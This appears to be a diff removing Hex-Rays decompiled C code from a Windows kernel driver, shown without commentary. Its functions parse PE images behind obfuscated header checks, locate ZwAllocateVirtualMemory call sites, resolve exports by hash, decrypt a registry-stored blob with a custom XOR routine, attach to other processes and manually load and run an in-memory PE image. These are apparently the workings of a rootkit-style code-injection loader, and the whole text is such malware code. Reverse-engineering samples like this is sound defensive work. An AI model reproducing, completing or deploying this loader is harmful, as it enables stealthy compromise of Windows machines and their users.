- v8 = 0;
- if ( v7 >> 1 )
- {
- do
- {
- v9 = *(_DWORD *)(a2 + 8) + *(_DWORD *)v5 + (*(_WORD *)(v4 + 2 * v8) & 0xFFF);
- if ( *(_WORD *)(v4 + 2 * v8) & 0xF000 )
- {
- if ( v9 >= a1 && v9 < a1 + 12 )
- return -1073741637;
- }
- ++v8;
- }
- while ( v8 < v11 );
- }
- v5 += *(_DWORD *)(v5 + 4);
- v4 = v5 + 8;
- }
- result = 0;
- }
- }
- return result;
- }
- //----- (000119AE) --------------------------------------------------------
- char __fastcall sub_119AE(int a1, int a2)
- {
- int v2; // eax@1
- v2 = *(_DWORD *)(a2 + 36);
- return !(v2 & 0x2000000)
- && v2 & 0x20000000
- && v2 & 0x20
- && v2 & 0x40000000
- && (!strncmp((const char *)a2, ".text", 8) || !strncmp((const char *)a2, "PAGE", 8));
- }
- //----- (00011A08) --------------------------------------------------------
- char __usercall sub_11A08<al>(int a1<edi>)
- {
- unsigned int v1; // ecx@1
- v1 = 0;
- while ( (byte_12644[v1] & *(&byte_12644[v1] + a1 - (_DWORD)byte_12644)) == byte_12630[v1] )
- {
- ++v1;
- if ( v1 >= 0x14 )
- return *(_DWORD *)(a1 + 13) - *(_DWORD *)((char *)&ZwAllocateVirtualMemory + 13) == (_DWORD)((char *)ZwAllocateVirtualMemory
- - a1);
- }
- return 0;
- }
- //----- (00011A4A) --------------------------------------------------------
- int __userpurge sub_11A4A<eax>(int a1<eax>, int a2<ebx>, unsigned int a3)
- {
- int v3; // esi@1
- int v4; // edx@4
- int v5; // edi@4
- int v6; // edx@5
- unsigned int v7; // eax@6
- int v9; // [sp-4h] [bp-10h]@4
- unsigned int v10; // [sp+8h] [bp-4h]@1
- v10 = 0;
- v3 = a1;
- while ( 1 )
- {
- if ( a3 <= v3 + 5 )
- return 0;
- if ( *(_BYTE *)v3 == -24 )
- {
- v5 = *(_DWORD *)(v3 + 1) + v3 + 5;
- v4 = sub_1210F(a2, v5);
- if ( v4 )
- {
- if ( sub_119AE(v9, v4) )
- {
- v7 = *(_DWORD *)(v6 + 8);
- if ( v7 >= *(_DWORD *)(v6 + 16) )
- v7 = *(_DWORD *)(v6 + 16);
- if ( v5 + 20 <= v7 + *(_DWORD *)(a2 + 8) + *(_DWORD *)(v6 + 12) && sub_11A08(v5) )
- break;
- }
- }
- }
- ++v10;
- ++v3;
- if ( v10 >= 0x1E )
- return 0;
- }
- return v5;
- }
- //----- (00011ABC) --------------------------------------------------------
- const char *__usercall sub_11ABC<eax>(const char *result<eax>, int a2<ecx>)
- {
- int v2; // ebx@1
- v2 = a2 - 19;
- while ( (unsigned int)result < v2 )
- {
- while ( (unsigned int)result <= v2 - 4 )
- {
- if ( *(_DWORD *)result == dword_12658 )
- goto LABEL_7;
- ++result;
- }
- result = 0;
- LABEL_7:
- if ( !result )
- break;
- if ( !strncmp(result, (const char *)&dword_12658, 14) )
- return result;
- ++result;
- }
- return 0;
- }
- // 12658: using guessed type int dword_12658;
- //----- (00011B04) --------------------------------------------------------
- int __stdcall sub_11B04(int a1, const char *a2, unsigned int a3, int a4, int a5)
- {
- int result; // eax@2
- const char *v6; // ebx@7
- int v7; // eax@17
- unsigned int v8; // ecx@17
- int v9; // eax@24
- int v10; // [sp+Ch] [bp-4h]@7
- int v11; // [sp+Ch] [bp-4h]@14
- *(_BYTE *)a5 = 0;
- if ( sub_10886(0) )
- {
- result = (int)sub_11ABC(a2, a3);
- if ( result )
- {
- if ( *(_DWORD *)a4 && result != *(_DWORD *)a4 )
- *(_BYTE *)a5 = 1;
- else
- *(_DWORD *)a4 = result;
- }
- }
- else
- {
- v6 = a2;
- result = a3 - 10;
- v10 = (int)a2;
- if ( (unsigned int)a2 < a3 - 10 )
- {
- while ( 2 )
- {
- for ( result = v10; ; ++result )
- {
- if ( result > a3 - 14 )
- {
- v11 = 0;
- goto LABEL_15;
- }
- if ( *(_DWORD *)result == dword_12628 )
- break;
- }
- v11 = result;
- LABEL_15:
- if ( v11 )
- {
- if ( !strncmp((const char *)v11, (const char *)&dword_12628, 5) )
- {
- v8 = 0;
- v7 = v11;
- while ( (unsigned int)&v6[v8] < v11 )
- {
- if ( *(_BYTE *)v7 == -24
- && (NTSTATUS (__stdcall *)(HANDLE, PVOID *, ULONG, PULONG, ULONG, ULONG))(*(_DWORD *)(v7 + 1) + v7 + 5) == ZwAllocateVirtualMemory )
- {
- v9 = sub_11A4A(v11, a1, a3);
- if ( !v9 )
- break;
- if ( !*(_DWORD *)a4 || v9 == *(_DWORD *)a4 )
- {
- *(_DWORD *)a4 = v9;
- break;
- }
- result = a5;
- *(_BYTE *)a5 = 1;
- return result;
- }
- ++v8;
- --v7;
- if ( v8 >= 0x78 )
- break;
- }
- }
- v10 = v11 + 1;
- result = v10;
- if ( v10 < a3 - 10 )
- {
- v6 = a2;
- continue;
- }
- }
- break;
- }
- }
- }
- return result;
- }
- // 12628: using guessed type int dword_12628;
- //----- (00011C14) --------------------------------------------------------
- int *__cdecl sub_11C14()
- {
- int v0; // ebx@1
- int v1; // eax@2
- int v2; // ecx@3
- __int16 v3; // di@4
- int v4; // esi@4
- int v5; // edx@5
- unsigned int v6; // ecx@6
- int v7; // eax@8
- const char *v8; // ST04_4@8
- char v10; // [sp+Ch] [bp-2Ch]@3
- int v11; // [sp+20h] [bp-18h]@4
- unsigned __int16 v12; // [sp+24h] [bp-14h]@4
- int v13; // [sp+2Ch] [bp-Ch]@2
- int v14; // [sp+30h] [bp-8h]@4
- char v15; // [sp+37h] [bp-1h]@8
- v0 = 0;
- dword_146A8 = 0;
- if ( !dword_146AC )
- {
- v1 = sub_1098E();
- v13 = v1;
- if ( v1 )
- {
- if ( !sub_121E1((int)&v10, v1, 1) )
- {
- v3 = v12;
- v4 = v11;
- v14 = 0;
- if ( v12 > 0u )
- {
- while ( 1 )
- {
- if ( sub_119AE(v2, 40 * (unsigned __int16)v0 + v4) )
- {
- v6 = *(_DWORD *)(v5 + 16);
- if ( *(_DWORD *)(v5 + 8) < v6 )
- v6 = *(_DWORD *)(v5 + 8);
- v7 = v13 + *(_DWORD *)(v5 + 12);
- v8 = (const char *)(v13 + *(_DWORD *)(v5 + 12));
- v15 = 1;
- sub_11B04((int)&v10, v8, v7 + v2, (int)&v14, (int)&v15);
- if ( v15 )
- break;
- }
- ++v0;
- if ( (_WORD)v0 >= (unsigned __int16)v3 )
- {
- if ( !v14 )
- break;
- dword_146A8 = v14;
- return &dword_146A8;
- }
- }
- }
- }
- }
- dword_146AC = -1073741823;
- }
- return &dword_146A8;
- }
- // 146A8: using guessed type int dword_146A8;
- // 146AC: using guessed type int dword_146AC;
- //----- (00011CCC) --------------------------------------------------------
- int __stdcall sub_11CCC(int a1)
- {
- int v1; // eax@1
- int result; // eax@2
- int v3; // ebx@4
- int v4; // [sp+0h] [bp-8h]@6
- int v5; // [sp+4h] [bp-4h]@6
- v1 = *(_DWORD *)(a1 + 96);
- *(_DWORD *)(a1 + 28) = 0;
- if ( *(_DWORD *)(v1 + 8) != 40 || *(_DWORD *)(v1 + 4) != 40 )
- {
- result = -1073741811;
- }
- else
- {
- v3 = *(_DWORD *)(a1 + 12);
- if ( *(_DWORD *)v3 == -1347686387 )
- {
- v5 = 0;
- sub_10A8A((int)&v4, &v5);
- result = v5;
- if ( !v5 )
- {
- result = (*(int (__stdcall **)(_DWORD, int, int, _DWORD, int))v4)(
- *(_DWORD *)(v3 + 8),
- v3 + 16,
- v3 + 24,
- *(_DWORD *)(v3 + 32),
- v3 + 32);
- if ( !result )
- {
- *(_DWORD *)(a1 + 28) = 40;
- result = 0;
- }
- }
- }
- else
- {
- result = -1073741811;
- }
- }
- return result;
- }
- //----- (00011D46) --------------------------------------------------------
- char __stdcall sub_11D46(int a1, unsigned int a2)
- {
- char result; // al@1
- unsigned int v3; // ecx@1
- v3 = 0;
- result = 0;
- if ( a2 )
- {
- do
- result += *(_BYTE *)(v3++ + a1);
- while ( v3 < a2 );
- }
- return result;
- }
- //----- (00011D62) --------------------------------------------------------
- NTSTATUS __userpurge sub_11D62<eax>(LSA_UNICODE_STRING *a1<eax>, PUNICODE_STRING ValueName, int a3)
- {
- NTSTATUS v3; // esi@1
- OBJECT_ATTRIBUTES ObjectAttributes; // [sp+8h] [bp-20h]@1
- int v6; // [sp+20h] [bp-8h]@1
- HANDLE Handle; // [sp+24h] [bp-4h]@1
- ObjectAttributes.ObjectName = a1;
- LOBYTE(v6) = 0;
- Handle = 0;
- ObjectAttributes.Length = 24;
- ObjectAttributes.RootDirectory = 0;
- ObjectAttributes.Attributes = 64;
- ObjectAttributes.SecurityDescriptor = 0;
- ObjectAttributes.SecurityQualityOfService = 0;
- v3 = ZwOpenKey(&Handle, 0x20019u, &ObjectAttributes);
- LOBYTE(v6) = v3 == 0;
- if ( !v3 )
- v3 = sub_11DD6((int)&v6, ValueName, a3);
- if ( (_BYTE)v6 )
- {
- LOBYTE(v6) = 0;
- ZwClose(Handle);
- }
- return v3;
- }
- //----- (00011DD6) --------------------------------------------------------
- signed int __stdcall sub_11DD6(int a1, PUNICODE_STRING ValueName, int a3)
- {
- PVOID v4; // edi@10
- signed int v5; // esi@14
- int v6; // eax@16
- int v7; // eax@17
- PVOID v8; // [sp-8h] [bp-34h]@7
- ULONG v9; // [sp-4h] [bp-30h]@7
- PVOID P; // [sp+10h] [bp-1Ch]@5
- ULONG ResultLength; // [sp+20h] [bp-Ch]@4
- NTSTATUS v12; // [sp+24h] [bp-8h]@5
- if ( !*(_BYTE *)a1
- || (ResultLength = 0,
- ZwQueryValueKey(*(HANDLE *)(a1 + 4), ValueName, KeyValuePartialInformation, 0, 0, &ResultLength) != -1073741789) )
- return -1073741823;
- v12 = 0;
- sub_105A0((int)&v12, ResultLength, (int)&P, 0);
- if ( v12 )
- {
- if ( !P )
- return v12;
- v9 = 0;
- v8 = P;
- LABEL_8:
- ExFreePoolWithTag(v8, v9);
- return v12;
- }
- v4 = P;
- v12 = ZwQueryValueKey(*(HANDLE *)(a1 + 4), ValueName, KeyValuePartialInformation, P, ResultLength, &ResultLength);
- if ( v12 )
- {
- if ( !v4 )
- return v12;
- v9 = 0;
- v8 = v4;
- goto LABEL_8;
- }
- if ( *((_DWORD *)v4 + 1) == 3 )
- {
- v6 = (int)ExAllocatePool(0, 0x10u);
- if ( v6 )
- {
- v7 = sub_105A0((int)&v12, *((_DWORD *)v4 + 2), v6, (char *)v4 + 12);
- v4 = P;
- }
- else
- {
- v7 = 0;
- }
- sub_1076E(a3, (PVOID *)v7);
- v5 = 0;
- if ( v12 )
- {
- v5 = v12;
- goto LABEL_15;
- }
- if ( *(_DWORD *)(a3 + 4) )
- goto LABEL_15;
- }
- v5 = -1073741823;
- LABEL_15:
- ExFreePoolWithTag(v4, 0);
- return v5;
- }
- //----- (00011EC6) --------------------------------------------------------
- int __usercall sub_11EC6<eax>(char a1<al>, int a2<ecx>, unsigned int a3<esi>)
- {
- unsigned int v3; // edx@2
- unsigned int v4; // eax@4
- int result; // eax@6
- char v7; // [sp+8h] [bp-10h]@1
- char v8; // [sp+Ch] [bp-Ch]@1
- signed int v9; // [sp+10h] [bp-8h]@1
- unsigned int v10; // [sp+14h] [bp-4h]@1
- v10 = a3 >> 1;
- v7 = a1 ^ 0xD;
- v8 = a1 ^ 0xEF;
- v9 = 7;
- do
- {
- v3 = 0;
- if ( a3 )
- {
- do
- {
- *(_BYTE *)(v3 + a2) ^= v9 * v8 + v3 * v7;
- ++v3;
- }
- while ( v3 < a3 );
- }
- v4 = 0;
- if ( v10 )
- {
- do
- {
- *(_BYTE *)(v4 + a2) ^= *(_BYTE *)(((a3 + 1) >> 1) + a2 + v4);
- ++v4;
- }
- while ( v4 < v10 );
- }
- for ( result = a3 - 1; (unsigned int)result >= 1; --result )
- *(_BYTE *)(result + a2) -= *(_BYTE *)(result + a2 - 1);
- }
- while ( v9-- - 1 >= 0 );
- return result;
- }
- //----- (00011F42) --------------------------------------------------------
- int __stdcall sub_11F42(int a1, int a2, HANDLE Handle)
- {
- int v3; // eax@2
- int v4; // ecx@3
- int v5; // eax@5
- char ProcessInformation; // [sp+Ch] [bp-34h]@2
- int v8; // [sp+10h] [bp-30h]@3
- CPPEH_RECORD ms_exc; // [sp+28h] [bp-18h]@2
- *(_DWORD *)a1 = 0;
- *(_BYTE *)(a1 + 4) = 1;
- if ( !*(_DWORD *)a2 )
- {
- ms_exc.disabled = 0;
- v3 = sub_12000(Handle, &ProcessInformation);
- *(_DWORD *)a2 = v3;
- if ( !v3 )
- {
- v4 = v8;
- if ( v8 && (v5 = *(_DWORD *)(v8 + 8)) != 0 )
- {
- *(_DWORD *)a1 = v5;
- *(_BYTE *)(a1 + 4) = *(_BYTE *)(v4 + 2) != 0;
- }
- else
- {
- *(_DWORD *)a2 = -1073741823;
- }
- }
- ms_exc.disabled = -1;
- }
- return a1;
- }
- //----- (00011FC0) --------------------------------------------------------
- int __userpurge sub_11FC0<eax>(int a1<esi>, int a2, int a3)
- {
- *(_BYTE *)a1 = 0;
- sub_12094(a1 + 4, a2, a3);
- memset((void *)(a1 + 12), 0, 0x18u);
- if ( !*(_DWORD *)a2 )
- {
- KeStackAttachProcess(*(_DWORD *)(a1 + 8), a1 + 12);
- *(_BYTE *)a1 = 1;
- }
- return a1;
- }
- // 12604: using guessed type int __stdcall KeStackAttachProcess(_DWORD, _DWORD);
- //----- (00012000) --------------------------------------------------------
- int __stdcall sub_12000(HANDLE Handle, PVOID ProcessInformation)
- {
- int result; // eax@4
- NTSTATUS v3; // esi@5
- char v4; // [sp+10h] [bp-10h]@1
- PVOID Object; // [sp+14h] [bp-Ch]@3
- ULONG ReturnLength; // [sp+18h] [bp-8h]@6
- int v7; // [sp+1Ch] [bp-4h]@1
- v7 = 0;
- sub_12094((int)&v4, (int)&v7, (int)Handle);
- if ( v7 )
- {
- if ( v4 )
- {
- v4 = 0;
- ObfDereferenceObject(Object);
- }
- result = v7;
- }
- else
- {
- Handle = 0;
- v3 = ObOpenObjectByPointer(Object, 0, 0, 0, 0, 0, &Handle);
- if ( !v3 )
- {
- ReturnLength = 0;
- v3 = ZwQueryInformationProcess(Handle, 0, ProcessInformation, 0x18u, &ReturnLength);
- }
- if ( Handle )
- ZwClose(Handle);
- if ( v4 )
- {
- v4 = 0;
- ObfDereferenceObject(Object);
- }
- result = v3;
- }
- return result;
- }
- // 1260C: using guessed type int __stdcall ObOpenObjectByPointer(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD);
- //----- (00012094) --------------------------------------------------------
- int __userpurge sub_12094<eax>(int a1<ebx>, int a2<edi>, int a3)
- {
- char v3; // zf@1
- int v4; // eax@2
- *(_DWORD *)(a1 + 4) = 0;
- v3 = *(_DWORD *)a2 == 0;
- *(_BYTE *)a1 = 0;
- if ( v3 )
- {
- v4 = PsLookupProcessByProcessId(a3, a1 + 4);
- *(_DWORD *)a2 = v4;
- if ( !v4 )
- {
- if ( *(_DWORD *)(a1 + 4) )
- *(_BYTE *)a1 = 1;
- else
- *(_DWORD *)a2 = -1073741823;
- }
- }
- return a1;
- }
- // 12610: using guessed type int __stdcall PsLookupProcessByProcessId(_DWORD, _DWORD);
- //----- (000120CC) --------------------------------------------------------
- LONG_PTR __usercall sub_120CC<eax>(PVOID Object<ecx>, LONG_PTR result<eax>)
- {
- void *v2; // ecx@2
- if ( *(_BYTE *)result )
- {
- v2 = *(void **)(result + 4);
- *(_BYTE *)result = 0;
- result = ObfDereferenceObject(v2);
- }
- return result;
- }
- //----- (000120DE) --------------------------------------------------------
- int __cdecl sub_120DE(int a1)
- {
- int result; // eax@1
- int v2; // edx@1
- char v3; // cl@1
- int v4; // esi@2
- v2 = a1;
- v3 = *(_BYTE *)a1;
- for ( result = 0; *(_BYTE *)v2; result = v4 )
- {
- v4 = result * (7 * result + 1) + v3 * (17 * v3 + 12);
- ++v2;
- v3 = *(_BYTE *)v2;
- }
- return result;
- }
- //----- (0001210F) --------------------------------------------------------
- int __cdecl sub_1210F(int a1, unsigned int a2)
- {
- unsigned __int16 v2; // bx@1
- int v3; // edi@1
- int v4; // esi@1
- int v5; // eax@3
- unsigned int v6; // ecx@3
- int v7; // eax@5
- int result; // eax@8
- int v9; // [sp+14h] [bp+8h]@2
- v2 = *(_WORD *)(a1 + 24);
- v4 = *(_DWORD *)(a1 + 20);
- v3 = 0;
- if ( v2 <= 0u )
- {
- LABEL_8:
- result = 0;
- }
- else
- {
- v9 = *(_DWORD *)(a1 + 8);
- while ( 1 )
- {
- v5 = v4 + 40 * (unsigned __int16)v3;
- v6 = *(_DWORD *)(v5 + 8);
- if ( v6 >= *(_DWORD *)(v5 + 16) )
- v6 = *(_DWORD *)(v5 + 16);
- v7 = v9 + *(_DWORD *)(v5 + 12);
- if ( a2 >= v7 )
- {
- if ( a2 < v6 + v7 )
- break;
- }
- ++v3;
- if ( (_WORD)v3 >= v2 )
- goto LABEL_8;
- }
- result = v4 + 40 * (unsigned __int16)v3;
- }
- return result;
- }
- //----- (0001216B) --------------------------------------------------------
- signed int __usercall sub_1216B<eax>(int a1<eax>, unsigned int a2<ebx>)
- {
- int v2; // esi@1
- signed int result; // eax@2
- int v4; // edi@3
- int v5; // eax@6
- unsigned int v6; // ecx@6
- unsigned int v7; // eax@8
- int v8; // esi@12
- unsigned __int16 v9; // [sp+4h] [bp-4h]@1
- v2 = *(_DWORD *)(a1 + 20);
- v9 = *(_WORD *)(a1 + 24);
- if ( a2 < *(_DWORD *)(a1 + 26) )
- {
- v4 = 0;
- if ( !*(_DWORD *)(a1 + 4) )
- goto LABEL_17;
- if ( *(_WORD *)(a1 + 24) <= 0u )
- goto LABEL_14;
- while ( 1 )
- {
- v5 = v2 + 40 * (unsigned __int16)v4;
- v6 = *(_DWORD *)(v5 + 8);
- if ( v6 >= *(_DWORD *)(v5 + 16) )
- v6 = *(_DWORD *)(v5 + 16);
- v7 = *(_DWORD *)(v5 + 12);
- if ( a2 >= v7 )
- {
- if ( a2 < v6 + v7 )
- break;
- }
- ++v4;
- if ( (_WORD)v4 >= v9 )
- goto LABEL_14;
- }
- v8 = *(_DWORD *)(40 * (unsigned __int16)v4 + v2 + 36);
- if ( v8 & 0x2000000 || !(v8 & 0x40000000) )
- LABEL_14:
- result = 0;
- else
- LABEL_17:
- result = 1;
- }
- else
- {
- result = 0;
- }
- return result;
- }
- //----- (000121E1) --------------------------------------------------------
- signed int __cdecl sub_121E1(int a1, int a2, int a3)
- {
- int v4; // eax@3
- unsigned __int16 v5; // cx@4
- int v6; // edx@7
- int v7; // ecx@7
- __int16 v8; // dx@12
- if ( *(_WORD *)a2 != 23117 || (v4 = a2 + *(_DWORD *)(a2 + 60), (*(_DWORD *)v4 ^ 0xF750F284) != -145705004) )
- return 1;
- v5 = *(_WORD *)(v4 + 4);
- if ( 22531 == (v5 ^ 0x594F) )
- {
- if ( (*(_WORD *)(v4 + 24) ^ 0x5908) == 22531 && *(_WORD *)(v4 + 20) == 224 )
- {
- v7 = a1;
- *(_DWORD *)a1 = 0;
- v6 = v4 + 120;
- LABEL_12:
- *(_DWORD *)(v7 + 16) = v6;
- *(_DWORD *)(v7 + 26) = *(_DWORD *)(v4 + 80);
- *(_DWORD *)(v7 + 20) = *(_WORD *)(v4 + 20) + v4 + 24;
- v8 = *(_WORD *)(v4 + 6);
- *(_DWORD *)(v7 + 12) = v4;
- *(_DWORD *)(v7 + 4) = a3;
- *(_WORD *)(v7 + 24) = v8;
- *(_DWORD *)(v7 + 8) = a2;
- return 0;
- }
- }
- else
- {
- if ( 22531 == (v5 ^ 0xDE67) && (*(_WORD *)(v4 + 24) ^ 0x5A08) == 22531 && *(_WORD *)(v4 + 20) == 240 )
- {
- v7 = a1;
- *(_DWORD *)a1 = 1;
- v6 = v4 + 136;
- goto LABEL_12;
- }
- }
- return 1;
- }
- //----- (000122B3) --------------------------------------------------------
- signed int __cdecl sub_122B3(int a1, unsigned int a2)
- {
- signed int result; // eax@1
- result = sub_1216B(a1, a2);
- if ( result )
- result = a2 + *(_DWORD *)(a1 + 8);
- return result;
- }
- //----- (000122D0) --------------------------------------------------------
- bool __cdecl sub_122D0(int a1, unsigned int a2, int a3, int a4)
- {
- int v4; // esi@1
- bool result; // eax@2
- unsigned int v6; // eax@3
- v4 = *(_DWORD *)(a1 + 16) + 8 * a2;
- if ( a2 >= 0x10 )
- return 1;
- v6 = *(_DWORD *)v4;
- if ( *(_DWORD *)v4 )
- {
- if ( v6 + *(_DWORD *)(v4 + 4) > *(_DWORD *)(a1 + 26) )
- return 1;
- *(_DWORD *)a3 = sub_122B3(a1, *(_DWORD *)v4);
- *(_DWORD *)a4 = *(_DWORD *)(v4 + 4);
- result = *(_DWORD *)a3 == 0;
- }
- else
- {
- LOBYTE(v6) = *(_DWORD *)(v4 + 4) == v6;
- result = v6 + 1;
- }
- return result;
- }
- //----- (00012323) --------------------------------------------------------
- signed int __usercall sub_12323<eax>(unsigned int a1<eax>, int a2, int a3, unsigned __int16 a4)
- {
- signed int v4; // eax@1
- unsigned int v5; // esi@1
- unsigned int v6; // eax@3
- signed int result; // eax@4
- v5 = a1;
- v4 = sub_122B3(a2, *(_DWORD *)(a1 + 28));
- if ( !v4
- || (unsigned int)a4 >= *(_DWORD *)(v5 + 20)
- || (v6 = *(_DWORD *)(v4 + 4 * a4), !v6)
- || (result = sub_122B3(a2, v6), !result)
- || result >= v5 && result < a3 + v5 )
- result = 0;
- return result;
- }
- //----- (0001236B) --------------------------------------------------------
- signed int __cdecl sub_1236B(int a1, int a2)
- {
- unsigned int v2; // esi@1
- signed int result; // eax@2
- unsigned int v4; // edi@3
- unsigned int v5; // ebx@6
- int v6; // eax@7
- int v7; // [sp+4h] [bp-Ch]@1
- int v8; // [sp+8h] [bp-8h]@4
- int v9; // [sp+Ch] [bp-4h]@1
- v2 = 0;
- if ( sub_122D0(a1, 0, (int)&v9, (int)&v7) )
- {
- result = 0;
- }
- else
- {
- v4 = v9;
- v9 = sub_122B3(a1, *(_DWORD *)(v9 + 32));
- if ( v9 && (v8 = sub_122B3(a1, *(_DWORD *)(v4 + 36))) != 0 )
- {
- v5 = *(_DWORD *)(v4 + 24);
- if ( v5 )
- {
- do
- {
- v6 = sub_122B3(a1, *(_DWORD *)(v9 + 4 * v2));
- if ( !v6 )
- break;
- if ( sub_120DE(v6) == a2 )
- return sub_12323(v4, a1, v7, *(_WORD *)(v8 + 2 * v2));
- ++v2;
- }
- while ( v2 < v5 );
- }
- result = 0;
- }
- else
- {
- result = 0;
- }
- }
- return result;
- }
- //----- (00012A24) --------------------------------------------------------
- signed int __usercall sub_12A24<eax>(int a1<esi>)
- {
- int v1; // edi@1
- int (__stdcall *v2)(_DWORD); // ebx@1
- int v3; // eax@1
- int v4; // eax@1
- signed int result; // eax@2
- v1 = sub_12D71((void *)0x2B8);
- v2 = *(int (__stdcall **)(_DWORD))(v1 + 32);
- *(_BYTE *)a1 = 21;
- *(_DWORD *)(a1 + 1) = 57;
- *(_DWORD *)(a1 + 13) = sub_12D71((void *)0x652);
- *(_DWORD *)(a1 + 17) = sub_12D71((void *)0x686);
- *(_DWORD *)(a1 + 21) = *(_DWORD *)(v1 + 40);
- *(_DWORD *)(a1 + 25) = *(_DWORD *)(v1 + 24);
- *(_DWORD *)(a1 + 29) = *(_DWORD *)(v1 + 72);
- v3 = sub_12D71((void *)0x260);
- v4 = v2(v3);
- *(_DWORD *)(a1 + 33) = v4;
- if ( v4 )
- {
- *(_DWORD *)(a1 + 41) = 0;
- *(_DWORD *)(a1 + 45) = 0;
- *(_DWORD *)(a1 + 49) = 1;
- result = 0;
- }
- else
- {
- result = 1;
- }
- return result;
- }
- //----- (00012A95) --------------------------------------------------------
- signed int __cdecl sub_12A95(int a1)
- {
- signed int result; // eax@1
- int v2; // edi@1
- int v3; // eax@2
- int v4; // eax@2
- int v5; // ecx@4
- char v6; // [sp+Ch] [bp-84h]@4
- char v7; // [sp+4Ch] [bp-44h]@1
- int v8; // [sp+51h] [bp-3Fh]@2
- int v9; // [sp+55h] [bp-3Bh]@2
- int (__cdecl *v10)(char *); // [sp+88h] [bp-8h]@1
- int (__cdecl *v11)(char *, int); // [sp+8Ch] [bp-4h]@1
- v2 = *(_DWORD *)(a1 + 88);
- v11 = (int (__cdecl *)(char *, int))(v2 + 149 + *(_DWORD *)(v2 + 113));
- v10 = (int (__cdecl *)(char *))(v2 + 149 + *(_DWORD *)(v2 + 129));
- *(_WORD *)(v2 + 149) = 23117;
- *(_DWORD *)(v2 + 149 + *(_DWORD *)(v2 + 141)) = 17744;
- *(_WORD *)(v2 + 149 + *(_DWORD *)(v2 + 145)) = 267;
- result = sub_12A24((int)&v7);
- if ( !result )
- {
- v3 = *(_DWORD *)(v2 + 1);
- v8 = v2 + 149;
- v9 = v3;
- v4 = sub_12D71((void *)0x350);
- result = v11(&v7, v4);
- if ( !result )
- {
- result = sub_12A24((int)&v7);
- if ( !result )
- {
- v5 = *(_DWORD *)(a1 + 96);
- v9 = *(_DWORD *)(a1 + 104);
- v8 = v5;
- result = v11(&v7, (int)&v6);
- if ( !result )
- {
- result = v10(&v6);
- if ( result )
- result = ((int (*)(void))result)();
- }
- }
- }
- }
- return result;
- }
- //----- (00012D37) --------------------------------------------------------
- bool __usercall sub_12D37<eax>(int a1<eax>, int a2)
- {
- int (__stdcall *v2)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // ecx@1
- bool result; // eax@2
- int v4; // [sp+0h] [bp-4h]@1
- v2 = *(int (__stdcall **)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD))(a1 + 80);
- v4 = 0;
- if ( v2(*(_DWORD *)(a1 + 144), 2242560, a2, 40, a2, 40, &v4, 0) )
- result = v4 != 40;
- else
- result = 1;
- return result;
- }
- //----- (00012D71) --------------------------------------------------------
- int __thiscall sub_12D71(void *this)
- {
- return (int)((char *)this + 75412);
- }
- //----- (00013343) --------------------------------------------------------
- signed int __usercall sub_13343<eax>(int a1<eax>, unsigned int a2)
- {
- unsigned int v2; // edi@1
- int v4; // ecx@3
- unsigned int v5; // ebx@4
- int v6; // eax@7
- unsigned int v7; // edx@8
- int v8; // ecx@8
- unsigned int v9; // [sp+8h] [bp-4h]@1
- v9 = 0;
- LOWORD(v2) = *(_WORD *)(a1 + 24);
- if ( *(_DWORD *)a1 || (v4 = *(_DWORD *)(a1 + 12), *(_DWORD *)(v4 + 84) > a2) )
- return 2;
- v5 = *(_DWORD *)(a1 + 26);
- if ( !(*(_DWORD *)(a1 + 26) % *(_DWORD *)(v4 + 56)) && *(_WORD *)(v4 + 6) )
- {
- v2 = (unsigned __int16)v2;
- if ( !(_WORD)v2 )
- return 0;
- v6 = *(_DWORD *)(a1 + 20) + 16;
- while ( 1 )
- {
- v8 = *(_DWORD *)v6;
- v7 = *(_DWORD *)(v6 - 8);
- if ( *(_DWORD *)v6 >= v7 )
- v8 = *(_DWORD *)(v6 - 8);
- if ( v8 + *(_DWORD *)(v6 + 4) > a2 || v7 + *(_DWORD *)(v6 - 4) > v5 )
- break;
- v6 += 40;
- ++v9;
- if ( v9 >= v2 )
- return 0;
- }
- }
- return 2;
- }
- //----- (000133BF) --------------------------------------------------------
- int __usercall sub_133BF<eax>(int a1<eax>, int a2, int a3)
- {
- int result; // eax@1
- int v4; // ecx@1
- int v5; // ebx@2
- int v6; // esi@2
- int v7; // edx@3
- int v8; // ecx@5
- int i; // edi@5
- v4 = *(_DWORD *)(a1 + 20);
- result = *(_WORD *)(a1 + 24);
- if ( result )
- {
- v6 = v4 + 8;
- v5 = result;
- do
- {
- v7 = *(_DWORD *)v6;
- if ( *(_DWORD *)(v6 + 8) < *(_DWORD *)v6 )
- v7 = *(_DWORD *)(v6 + 8);
- v8 = *(_DWORD *)(a2 + 5) + *(_DWORD *)(v6 + 12);
- result = a3 + *(_DWORD *)(v6 + 4);
- for ( i = v7; i; ++v8 )
- {
- --i;
- *(_BYTE *)result++ = *(_BYTE *)v8;
- }
- v6 += 40;
- --v5;
- }
- while ( v5 );
- }
- return result;
- }
- //----- (00013409) --------------------------------------------------------
- int __usercall sub_13409<eax>(int a1<eax>, int a2, int a3, int a4)
- {
- unsigned int v4; // edi@1
- int v5; // eax@4
- char v6; // dl@4
- int v7; // ecx@4
- int v8; // esi@5
- int v10; // [sp+Ch] [bp-Ch]@2
- unsigned int v11; // [sp+10h] [bp-8h]@1
- int v12; // [sp+14h] [bp-4h]@2
- v4 = 0;
- v11 = *(_DWORD *)(a1 + 45);
- if ( v11 )
- {
- v10 = *(_DWORD *)(a1 + 41);
- v12 = *(_DWORD *)(a1 + 41);
- while ( 1 )
- {
- if ( !sub_13CC0(a2, *(_DWORD *)v12) )
- {
- v7 = *(_DWORD *)(v12 + 4);
- v6 = *(_BYTE *)v7;
- v5 = *(_BYTE *)a3 - *(_BYTE *)v7;
- if ( *(_BYTE *)a3 == *(_BYTE *)v7 )
- {
- v8 = a3 - v7;
- do
- {
- if ( !v6 )
- break;
- ++v7;
- v6 = *(_BYTE *)v7;
- v5 = *(_BYTE *)(v8 + v7) - *(_BYTE *)v7;
- }
- while ( *(_BYTE *)(v8 + v7) == *(_BYTE *)v7 );
- }
- if ( v5 >= 0 )
- {
- if ( v5 > 0 )
- v5 = 1;
- if ( !v5 )
- break;
- }
- }
- v12 += 12;
- ++v4;
- if ( v4 >= v11 )
- goto LABEL_13;
- }
- *(_DWORD *)a4 = *(_DWORD *)(12 * v4 + v10 + 8);
- }
- else
- {
- LABEL_13:
- *(_DWORD *)a4 = 0;
- }
- return 0;
- }
